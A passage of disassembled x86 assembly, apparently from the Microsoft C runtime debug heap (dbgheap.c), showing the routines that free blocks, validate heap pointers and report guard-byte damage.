loc_41761B: ; CODE XREF: sub_4174F0+E6�j
; sub_4174F0+EF�j ...
xor edx, edx
test edx, edx
jnz short loc_4175C8
mov eax, dword_442C00
and eax, 4
test eax, eax
jnz loc_4176F6
push 4
mov cl, byte_442C0C
push ecx
mov edx, [ebp+var_4]
add edx, 1Ch
push edx
call sub_417B40
add esp, 0Ch
test eax, eax
jnz short loc_417690
loc_41764D: ; CODE XREF: sub_4174F0+19E�j
mov eax, [ebp+var_4]
add eax, 20h
push eax
mov ecx, [ebp+var_4]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+var_4]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, off_442C10[ecx*4]
push edx
push offset aDamageBeforeHs ; "DAMAGE: before %hs block (#%d) at 0x%08"...
push 0
push 0
push 0
push 1
call sub_41BF80
add esp, 20h
cmp eax, 1
jnz short loc_41768A
int 3 ; Trap to Debugger
loc_41768A: ; CODE XREF: sub_4174F0+197�j
xor eax, eax
test eax, eax
jnz short loc_41764D
loc_417690: ; CODE XREF: sub_4174F0+15B�j
push 4
mov cl, byte_442C0C
push ecx
mov edx, [ebp+var_4]
mov eax, [edx+10h]
mov ecx, [ebp+var_4]
lea edx, [ecx+eax+20h]
push edx
call sub_417B40
add esp, 0Ch
test eax, eax
jnz short loc_4176F6
loc_4176B3: ; CODE XREF: sub_4174F0+204�j
mov eax, [ebp+var_4]
add eax, 20h
push eax
mov ecx, [ebp+var_4]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+var_4]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, off_442C10[ecx*4]
push edx
push offset aDamageAfterHsB ; "DAMAGE: after %hs block (#%d) at 0x%08X"...
push 0
push 0
push 0
push 1
call sub_41BF80
add esp, 20h
cmp eax, 1
jnz short loc_4176F0
int 3 ; Trap to Debugger
loc_4176F0: ; CODE XREF: sub_4174F0+1FD�j
xor eax, eax
test eax, eax
jnz short loc_4176B3
loc_4176F6: ; CODE XREF: sub_4174F0+13B�j
; sub_4174F0+1C1�j
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+14h], 3
jnz short loc_41776B
loc_4176FF: ; CODE XREF: sub_4174F0+249�j
mov edx, [ebp+var_4]
cmp dword ptr [edx+0Ch], 0FEDCBABCh
jnz short loc_417714
mov eax, [ebp+var_4]
cmp dword ptr [eax+18h], 0
jz short loc_417735
loc_417714: ; CODE XREF: sub_4174F0+219�j
push offset aPheadNlineIgno ; "pHead->nLine == IGNORE_LINE && pHead->l"...
push 0
push 40Eh
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_417735
int 3 ; Trap to Debugger
loc_417735: ; CODE XREF: sub_4174F0+222�j
; sub_4174F0+242�j
xor ecx, ecx
test ecx, ecx
jnz short loc_4176FF
mov edx, [ebp+var_4]
mov eax, [edx+10h]
add eax, 24h
push eax
xor ecx, ecx
mov cl, byte_442C0D
push ecx
mov edx, [ebp+var_4]
push edx
call sub_4189A0
add esp, 0Ch
mov eax, [ebp+var_4]
push eax
call sub_41C8C0
add esp, 4
jmp loc_4178D5
; ---------------------------------------------------------------------------
loc_41776B: ; CODE XREF: sub_4174F0+20D�j
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+14h], 2
jnz short loc_417781
cmp [ebp+arg_4], 1
jnz short loc_417781
mov [ebp+arg_4], 2
loc_417781: ; CODE XREF: sub_4174F0+282�j
; sub_4174F0+288�j ...
mov edx, [ebp+var_4]
mov eax, [edx+14h]
cmp eax, [ebp+arg_4]
jz short loc_4177AD
push offset aPheadNblockuse ; "pHead->nBlockUse == nBlockUse"
push 0
push 41Bh
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_4177AD
int 3 ; Trap to Debugger
loc_4177AD: ; CODE XREF: sub_4174F0+29A�j
; sub_4174F0+2BA�j
xor ecx, ecx
test ecx, ecx
jnz short loc_417781
mov edx, [ebp+var_4]
mov eax, dword_492068
sub eax, [edx+10h]
mov dword_492068, eax
mov ecx, dword_442C00
and ecx, 2
test ecx, ecx
jnz loc_4178AC
mov edx, [ebp+var_4]
cmp dword ptr [edx], 0
jz short loc_4177EC
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
mov eax, [edx+4]
mov [ecx+4], eax
jmp short loc_41782A
; ---------------------------------------------------------------------------
loc_4177EC: ; CODE XREF: sub_4174F0+2EA�j
; sub_4174F0+32C�j
mov ecx, dword_49205C
cmp ecx, [ebp+var_4]
jz short loc_417818
push offset a_plastblockPhe ; "_pLastBlock == pHead"
push 0
push 42Ah
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_417818
int 3 ; Trap to Debugger
loc_417818: ; CODE XREF: sub_4174F0+305�j
; sub_4174F0+325�j
xor edx, edx
test edx, edx
jnz short loc_4177EC
mov eax, [ebp+var_4]
mov ecx, [eax+4]
mov dword_49205C, ecx
loc_41782A: ; CODE XREF: sub_4174F0+2FA�j
mov edx, [ebp+var_4]
cmp dword ptr [edx+4], 0
jz short loc_417842
mov eax, [ebp+var_4]
mov ecx, [eax+4]
mov edx, [ebp+var_4]
mov eax, [edx]
mov [ecx], eax
jmp short loc_41787F
; ---------------------------------------------------------------------------
loc_417842: ; CODE XREF: sub_4174F0+341�j
; sub_4174F0+382�j
mov ecx, dword_492064
cmp ecx, [ebp+var_4]
jz short loc_41786E
push offset a_pfirstblockPh ; "_pFirstBlock == pHead"
push 0
push 434h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41786E
int 3 ; Trap to Debugger
loc_41786E: ; CODE XREF: sub_4174F0+35B�j
; sub_4174F0+37B�j
xor edx, edx
test edx, edx
jnz short loc_417842
mov eax, [ebp+var_4]
mov ecx, [eax]
mov dword_492064, ecx
loc_41787F: ; CODE XREF: sub_4174F0+350�j
mov edx, [ebp+var_4]
mov eax, [edx+10h]
add eax, 24h
push eax
xor ecx, ecx
mov cl, byte_442C0D
push ecx
mov edx, [ebp+var_4]
push edx
call sub_4189A0
add esp, 0Ch
mov eax, [ebp+var_4]
push eax
call sub_41C8C0
add esp, 4
jmp short loc_4178D5
; ---------------------------------------------------------------------------
loc_4178AC: ; CODE XREF: sub_4174F0+2DE�j
mov ecx, [ebp+var_4]
mov dword ptr [ecx+14h], 0
mov edx, [ebp+var_4]
mov eax, [edx+10h]
push eax
xor ecx, ecx
mov cl, byte_442C0D
push ecx
mov edx, [ebp+var_4]
add edx, 20h
push edx
call sub_4189A0
add esp, 0Ch
loc_4178D5: ; CODE XREF: sub_4174F0+49�j
; sub_4174F0+93�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4174F0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
mov eax, [ebp+8]
push eax
call sub_417900
add esp, 8
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417900 proc near ; CODE XREF: .text:004178E9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
mov eax, dword_442C00
and eax, 4
test eax, eax
jz short loc_417945
loc_417915: ; CODE XREF: sub_417900+43�j
call sub_417BD0
test eax, eax
jnz short loc_41793F
push offset a_crtcheckmemor ; "_CrtCheckMemory()"
push 0
push 47Ch
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41793F
int 3 ; Trap to Debugger
loc_41793F: ; CODE XREF: sub_417900+1C�j
; sub_417900+3C�j
xor ecx, ecx
test ecx, ecx
jnz short loc_417915
loc_417945: ; CODE XREF: sub_417900+13�j
push 9
call sub_41BC90
add esp, 4
loc_41794F: ; CODE XREF: sub_417900+84�j
mov edx, [ebp+arg_0]
push edx
call sub_418030
add esp, 4
test eax, eax
jnz short loc_417980
push offset a_crtisvalidhea ; "_CrtIsValidHeapPointer(pUserData)"
push 0
push 485h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_417980
int 3 ; Trap to Debugger
loc_417980: ; CODE XREF: sub_417900+5D�j
; sub_417900+7D�j
xor eax, eax
test eax, eax
jnz short loc_41794F
mov ecx, [ebp+arg_0]
sub ecx, 20h
mov [ebp+var_8], ecx
loc_41798F: ; CODE XREF: sub_417900+E6�j
mov edx, [ebp+var_8]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 4
jz short loc_4179E2
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+14h], 1
jz short loc_4179E2
mov edx, [ebp+var_8]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jz short loc_4179E2
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+14h], 3
jz short loc_4179E2
push offset a_block_type_is ; "_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
push 0
push 48Bh
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_4179E2
int 3 ; Trap to Debugger
loc_4179E2: ; CODE XREF: sub_417900+9D�j
; sub_417900+A6�j ...
xor edx, edx
test edx, edx
jnz short loc_41798F
mov eax, [ebp+var_8]
cmp dword ptr [eax+14h], 2
jnz short loc_4179FE
cmp [ebp+arg_4], 1
jnz short loc_4179FE
mov [ebp+arg_4], 2
loc_4179FE: ; CODE XREF: sub_417900+EF�j
; sub_417900+F5�j
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+14h], 3
jz short loc_417A39
loc_417A07: ; CODE XREF: sub_417900+137�j
mov edx, [ebp+var_8]
mov eax, [edx+14h]
cmp eax, [ebp+arg_4]
jz short loc_417A33
push offset aPheadNblockuse ; "pHead->nBlockUse == nBlockUse"
push 0
push 492h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_417A33
int 3 ; Trap to Debugger
loc_417A33: ; CODE XREF: sub_417900+110�j
; sub_417900+130�j
xor ecx, ecx
test ecx, ecx
jnz short loc_417A07
loc_417A39: ; CODE XREF: sub_417900+105�j
mov edx, [ebp+var_8]
mov eax, [edx+10h]
mov [ebp+var_4], eax
push 9
call sub_41BD30
add esp, 4
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_417900 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, dword_442C08
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_442C08, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push 9
call sub_41BC90
add esp, 4
mov eax, [ebp+8]
push eax
call sub_418030
add esp, 4
test eax, eax
jz short loc_417B0C
mov ecx, [ebp+8]
sub ecx, 20h
mov [ebp-4], ecx
loc_417AAA: ; CODE XREF: .text:00417B01�j
mov edx, [ebp-4]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 4
jz short loc_417AFD
mov ecx, [ebp-4]
cmp dword ptr [ecx+14h], 1
jz short loc_417AFD
mov edx, [ebp-4]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jz short loc_417AFD
mov ecx, [ebp-4]
cmp dword ptr [ecx+14h], 3
jz short loc_417AFD
push offset a_block_type_is ; "_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
push 0
push 4D3h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_417AFD
int 3 ; Trap to Debugger
loc_417AFD: ; CODE XREF: .text:00417AB8�j
; .text:00417AC1�j ...
xor edx, edx
test edx, edx
jnz short loc_417AAA
mov eax, [ebp-4]
mov ecx, [ebp+0Ch]
mov [eax+14h], ecx
loc_417B0C: ; CODE XREF: .text:00417A9F�j
push 9
call sub_41BD30
add esp, 4
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, off_442D18
mov [ebp-4], eax
mov ecx, [ebp+8]
mov off_442D18, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417B40 proc near ; CODE XREF: sub_4174F0+151�p
; sub_4174F0+1B7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], 1
loc_417B4E: ; CODE XREF: sub_417B40:loc_417BBC�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_8]
sub ecx, 1
mov [ebp+arg_8], ecx
test eax, eax
jz short loc_417BBE
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+arg_4]
and ecx, 0FFh
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
cmp eax, ecx
jz short loc_417BBC
loc_417B7B: ; CODE XREF: sub_417B40+73�j
mov eax, [ebp+arg_4]
and eax, 0FFh
push eax
mov ecx, [ebp+arg_0]
xor edx, edx
mov dl, [ecx-1]
push edx
mov eax, [ebp+arg_0]
sub eax, 1
push eax
push offset aMemoryCheckErr ; "memory check error at 0x%08X = 0x%02X, "...
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 20h
cmp eax, 1
jnz short loc_417BAF
int 3 ; Trap to Debugger
loc_417BAF: ; CODE XREF: sub_417B40+6C�j
xor ecx, ecx
test ecx, ecx
jnz short loc_417B7B
mov [ebp+var_4], 0
loc_417BBC: ; CODE XREF: sub_417B40+39�j
jmp short loc_417B4E
; ---------------------------------------------------------------------------
loc_417BBE: ; CODE XREF: sub_417B40+1C�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_417B40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417BD0 proc near ; CODE XREF: sub_416B00:loc_416B1C�p
; sub_416F00:loc_416F62�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_4], 1
mov eax, dword_442C00
and eax, 1
test eax, eax
jnz short loc_417BF6
mov eax, 1
jmp loc_417F28
; ---------------------------------------------------------------------------
loc_417BF6: ; CODE XREF: sub_417BD0+1A�j
push 9
call sub_41BC90
add esp, 4
call sub_41C930
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jz loc_417D19
cmp [ebp+var_C], 0FFFFFFFEh
jz loc_417D19
mov ecx, [ebp+var_C]
mov [ebp+var_18], ecx
mov edx, [ebp+var_18]
add edx, 6
mov [ebp+var_18], edx
cmp [ebp+var_18], 3
ja loc_417CE2
mov eax, [ebp+var_18]
jmp ds:off_417F2F[eax*4]
loc_417C3F: ; CODE XREF: sub_417BD0+93�j
; DATA XREF: .text:00417F3B�o
push offset a_heapchkFailsW ; "_heapchk fails with _HEAPBADBEGIN.\n"
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_417C5F
int 3 ; Trap to Debugger
loc_417C5F: ; CODE XREF: sub_417BD0+8C�j
xor ecx, ecx
test ecx, ecx
jnz short loc_417C3F
jmp loc_417D08
; ---------------------------------------------------------------------------
loc_417C6A: ; CODE XREF: sub_417BD0+68�j
; sub_417BD0+BE�j
; DATA XREF: ...
push offset a_heapchkFail_0 ; "_heapchk fails with _HEAPBADNODE.\n"
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_417C8A
int 3 ; Trap to Debugger
loc_417C8A: ; CODE XREF: sub_417BD0+B7�j
xor edx, edx
test edx, edx
jnz short loc_417C6A
jmp short loc_417D08
; ---------------------------------------------------------------------------
loc_417C92: ; CODE XREF: sub_417BD0+68�j
; sub_417BD0+E6�j
; DATA XREF: ...
push offset a_heapchkFail_1 ; "_heapchk fails with _HEAPBADEND.\n"
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_417CB2
int 3 ; Trap to Debugger
loc_417CB2: ; CODE XREF: sub_417BD0+DF�j
xor eax, eax
test eax, eax
jnz short loc_417C92
jmp short loc_417D08
; ---------------------------------------------------------------------------
loc_417CBA: ; CODE XREF: sub_417BD0+68�j
; sub_417BD0+10E�j
; DATA XREF: ...
push offset a_heapchkFail_2 ; "_heapchk fails with _HEAPBADPTR.\n"
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_417CDA
int 3 ; Trap to Debugger
loc_417CDA: ; CODE XREF: sub_417BD0+107�j
xor ecx, ecx
test ecx, ecx
jnz short loc_417CBA
jmp short loc_417D08
; ---------------------------------------------------------------------------
loc_417CE2: ; CODE XREF: sub_417BD0+5F�j
; sub_417BD0+136�j
push offset a_heapchkFail_3 ; "_heapchk fails with unknown return valu"...
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_417D02
int 3 ; Trap to Debugger
loc_417D02: ; CODE XREF: sub_417BD0+12F�j
xor edx, edx
test edx, edx
jnz short loc_417CE2
loc_417D08: ; CODE XREF: sub_417BD0+95�j
; sub_417BD0+C0�j ...
push 9
call sub_41BD30
add esp, 4
xor eax, eax
jmp loc_417F28
; ---------------------------------------------------------------------------
loc_417D19: ; CODE XREF: sub_417BD0+3C�j
; sub_417BD0+46�j
mov eax, dword_492064
mov [ebp+var_8], eax
jmp short loc_417D2B
; ---------------------------------------------------------------------------
loc_417D23: ; CODE XREF: sub_417BD0:loc_417F16�j
mov ecx, [ebp+var_8]
mov edx, [ecx]
mov [ebp+var_8], edx
loc_417D2B: ; CODE XREF: sub_417BD0+151�j
cmp [ebp+var_8], 0
jz loc_417F1B
mov [ebp+var_10], 1
mov eax, [ebp+var_8]
mov ecx, [eax+14h]
and ecx, 0FFFFh
cmp ecx, 4
jz short loc_417D70
mov edx, [ebp+var_8]
cmp dword ptr [edx+14h], 1
jz short loc_417D70
mov eax, [ebp+var_8]
mov ecx, [eax+14h]
and ecx, 0FFFFh
cmp ecx, 2
jz short loc_417D70
mov edx, [ebp+var_8]
cmp dword ptr [edx+14h], 3
jnz short loc_417D88
loc_417D70: ; CODE XREF: sub_417BD0+17B�j
; sub_417BD0+184�j ...
mov eax, [ebp+var_8]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, off_442C10[ecx*4]
mov [ebp+var_14], edx
jmp short loc_417D8F
; ---------------------------------------------------------------------------
loc_417D88: ; CODE XREF: sub_417BD0+19E�j
mov [ebp+var_14], offset aDamaged ; "DAMAGED"
loc_417D8F: ; CODE XREF: sub_417BD0+1B6�j
push 4
mov al, byte_442C0C
push eax
mov ecx, [ebp+var_8]
add ecx, 1Ch
push ecx
call sub_417B40
add esp, 0Ch
test eax, eax
jnz short loc_417DE4
loc_417DAA: ; CODE XREF: sub_417BD0+20B�j
mov edx, [ebp+var_8]
add edx, 20h
push edx
mov eax, [ebp+var_8]
mov ecx, [eax+18h]
push ecx
mov edx, [ebp+var_14]
push edx
push offset aDamageBeforeHs ; "DAMAGE: before %hs block (#%d) at 0x%08"...
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 20h
cmp eax, 1
jnz short loc_417DD7
int 3 ; Trap to Debugger
loc_417DD7: ; CODE XREF: sub_417BD0+204�j
xor eax, eax
test eax, eax
jnz short loc_417DAA
mov [ebp+var_10], 0
loc_417DE4: ; CODE XREF: sub_417BD0+1D8�j
push 4
mov cl, byte_442C0C
push ecx
mov edx, [ebp+var_8]
mov eax, [edx+10h]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax+20h]
push edx
call sub_417B40
add esp, 0Ch
test eax, eax
jnz short loc_417E41
loc_417E07: ; CODE XREF: sub_417BD0+268�j
mov eax, [ebp+var_8]
add eax, 20h
push eax
mov ecx, [ebp+var_8]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+var_14]
push eax
push offset aDamageAfterHsB ; "DAMAGE: after %hs block (#%d) at 0x%08X"...
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 20h
cmp eax, 1
jnz short loc_417E34
int 3 ; Trap to Debugger
loc_417E34: ; CODE XREF: sub_417BD0+261�j
xor ecx, ecx
test ecx, ecx
jnz short loc_417E07
mov [ebp+var_10], 0
loc_417E41: ; CODE XREF: sub_417BD0+235�j
mov edx, [ebp+var_8]
cmp dword ptr [edx+14h], 0
jnz short loc_417E9A
mov eax, [ebp+var_8]
mov ecx, [eax+10h]
push ecx
mov dl, byte_442C0D
push edx
mov eax, [ebp+var_8]
add eax, 20h
push eax
call sub_417B40
add esp, 0Ch
test eax, eax
jnz short loc_417E9A
loc_417E6B: ; CODE XREF: sub_417BD0+2C1�j
mov ecx, [ebp+var_8]
add ecx, 20h
push ecx
push offset aDamageOnTopOfF ; "DAMAGE: on top of Free block at 0x%08X."...
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_417E8D
int 3 ; Trap to Debugger
loc_417E8D: ; CODE XREF: sub_417BD0+2BA�j
xor edx, edx
test edx, edx
jnz short loc_417E6B
mov [ebp+var_10], 0
loc_417E9A: ; CODE XREF: sub_417BD0+278�j
; sub_417BD0+299�j
cmp [ebp+var_10], 0
jnz short loc_417F16
mov eax, [ebp+var_8]
cmp dword ptr [eax+8], 0
jz short loc_417EDC
loc_417EA9: ; CODE XREF: sub_417BD0+30A�j
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
push edx
mov eax, [ebp+var_8]
mov ecx, [eax+8]
push ecx
mov edx, [ebp+var_14]
push edx
push offset aHsAllocatedAtF ; "%hs allocated at file %hs(%d).\n"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 20h
cmp eax, 1
jnz short loc_417ED6
int 3 ; Trap to Debugger
loc_417ED6: ; CODE XREF: sub_417BD0+303�j
xor eax, eax
test eax, eax
jnz short loc_417EA9
loc_417EDC: ; CODE XREF: sub_417BD0+2D7�j
; sub_417BD0+33D�j
mov ecx, [ebp+var_8]
mov edx, [ecx+10h]
push edx
mov eax, [ebp+var_8]
add eax, 20h
push eax
mov ecx, [ebp+var_14]
push ecx
push offset aHsLocatedAt0x0 ; "%hs located at 0x%08X is %u bytes long."...
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 20h
cmp eax, 1
jnz short loc_417F09
int 3 ; Trap to Debugger
loc_417F09: ; CODE XREF: sub_417BD0+336�j
xor edx, edx
test edx, edx
jnz short loc_417EDC
mov [ebp+var_4], 0
loc_417F16: ; CODE XREF: sub_417BD0+2CE�j
jmp loc_417D23
; ---------------------------------------------------------------------------
loc_417F1B: ; CODE XREF: sub_417BD0+15F�j
push 9
call sub_41BD30
add esp, 4
mov eax, [ebp+var_4]
loc_417F28: ; CODE XREF: sub_417BD0+21�j
; sub_417BD0+144�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_417BD0 endp
; ---------------------------------------------------------------------------
off_417F2F dd offset loc_417CBA ; DATA XREF: sub_417BD0+68�r
dd offset loc_417C92
dd offset loc_417C6A
dd offset loc_417C3F
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F40 proc near ; CODE XREF: sub_41B390+A0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, dword_442C00
mov [ebp+var_4], eax
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_417F5B
mov ecx, [ebp+arg_0]
mov dword_442C00, ecx
loc_417F5B: ; CODE XREF: sub_417F40+10�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_417F40 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, dword_442C00
and eax, 1
test eax, eax
jnz short loc_417F82
jmp short loc_417FD3
; ---------------------------------------------------------------------------
loc_417F82: ; CODE XREF: .text:00417F7E�j
push 9
call sub_41BC90
add esp, 4
mov ecx, dword_492064
mov [ebp-4], ecx
jmp short loc_417F9F
; ---------------------------------------------------------------------------
loc_417F97: ; CODE XREF: .text:loc_417FC7�j
mov edx, [ebp-4]
mov eax, [edx]
mov [ebp-4], eax
loc_417F9F: ; CODE XREF: .text:00417F95�j
cmp dword ptr [ebp-4], 0
jz short loc_417FC9
mov ecx, [ebp-4]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 4
jnz short loc_417FC7
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp-4]
add ecx, 20h
push ecx
call dword ptr [ebp+8]
add esp, 8
loc_417FC7: ; CODE XREF: .text:00417FB4�j
jmp short loc_417F97
; ---------------------------------------------------------------------------
loc_417FC9: ; CODE XREF: .text:00417FA3�j
push 9
call sub_41BD30
add esp, 4
loc_417FD3: ; CODE XREF: .text:00417F80�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417FE0 proc near ; CODE XREF: sub_418030+19�p
; .text:0041812A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jz short loc_41801D
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_49440C
test eax, eax
jnz short loc_41801D
cmp [ebp+arg_8], 0
jz short loc_418014
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_494408
test eax, eax
jnz short loc_41801D
loc_418014: ; CODE XREF: sub_417FE0+20�j
mov [ebp+var_4], 1
jmp short loc_418024
; ---------------------------------------------------------------------------
loc_41801D: ; CODE XREF: sub_417FE0+8�j
; sub_417FE0+1A�j ...
mov [ebp+var_4], 0
loc_418024: ; CODE XREF: sub_417FE0+3B�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_417FE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418030 proc near ; CODE XREF: sub_416F00+1AA�p
; sub_4174F0+9C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_41803E
xor eax, eax
jmp short loc_4180B2
; ---------------------------------------------------------------------------
loc_41803E: ; CODE XREF: sub_418030+8�j
push 1
push 20h
mov eax, [ebp+arg_0]
sub eax, 20h
push eax
call sub_417FE0
add esp, 0Ch
test eax, eax
jnz short loc_418059
xor eax, eax
jmp short loc_4180B2
; ---------------------------------------------------------------------------
loc_418059: ; CODE XREF: sub_418030+23�j
mov ecx, [ebp+arg_0]
sub ecx, 20h
push ecx
call sub_41CB40
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_418086
mov edx, [ebp+arg_0]
sub edx, 20h
push edx
mov eax, [ebp+var_4]
push eax
call sub_41CBA0
add esp, 8
jmp short loc_4180B2
; ---------------------------------------------------------------------------
loc_418086: ; CODE XREF: sub_418030+3F�j
mov ecx, dword_492094
and ecx, 8000h
test ecx, ecx
jz short loc_41809D
mov eax, 1
jmp short loc_4180B2
; ---------------------------------------------------------------------------
loc_41809D: ; CODE XREF: sub_418030+64�j
mov edx, [ebp+arg_0]
sub edx, 20h
push edx
push 0
mov eax, dword_49377C
push eax
call ds:dword_494410
loc_4180B2: ; CODE XREF: sub_418030+C�j
; sub_418030+27�j ...
mov esp, ebp
pop ebp
retn
sub_418030 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+8]
push eax
call sub_418030
add esp, 4
test eax, eax
jnz short loc_4180DB
xor eax, eax
jmp loc_41819F
; ---------------------------------------------------------------------------
loc_4180DB: ; CODE XREF: .text:004180D2�j
push 9
call sub_41BC90
add esp, 4
mov ecx, [ebp+8]
sub ecx, 20h
mov [ebp-4], ecx
mov edx, [ebp-4]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 4
jz short loc_418120
mov ecx, [ebp-4]
cmp dword ptr [ecx+14h], 1
jz short loc_418120
mov edx, [ebp-4]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jz short loc_418120
mov ecx, [ebp-4]
cmp dword ptr [ecx+14h], 3
jnz short loc_418193
loc_418120: ; CODE XREF: .text:004180FC�j
; .text:00418105�j ...
push 1
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_417FE0
add esp, 0Ch
test eax, eax
jz short loc_418193
mov ecx, [ebp-4]
mov edx, [ecx+10h]
cmp edx, [ebp+0Ch]
jnz short loc_418193
mov eax, [ebp-4]
mov ecx, [eax+18h]
cmp ecx, dword_442C04
jg short loc_418193
cmp dword ptr [ebp+10h], 0
jz short loc_418160
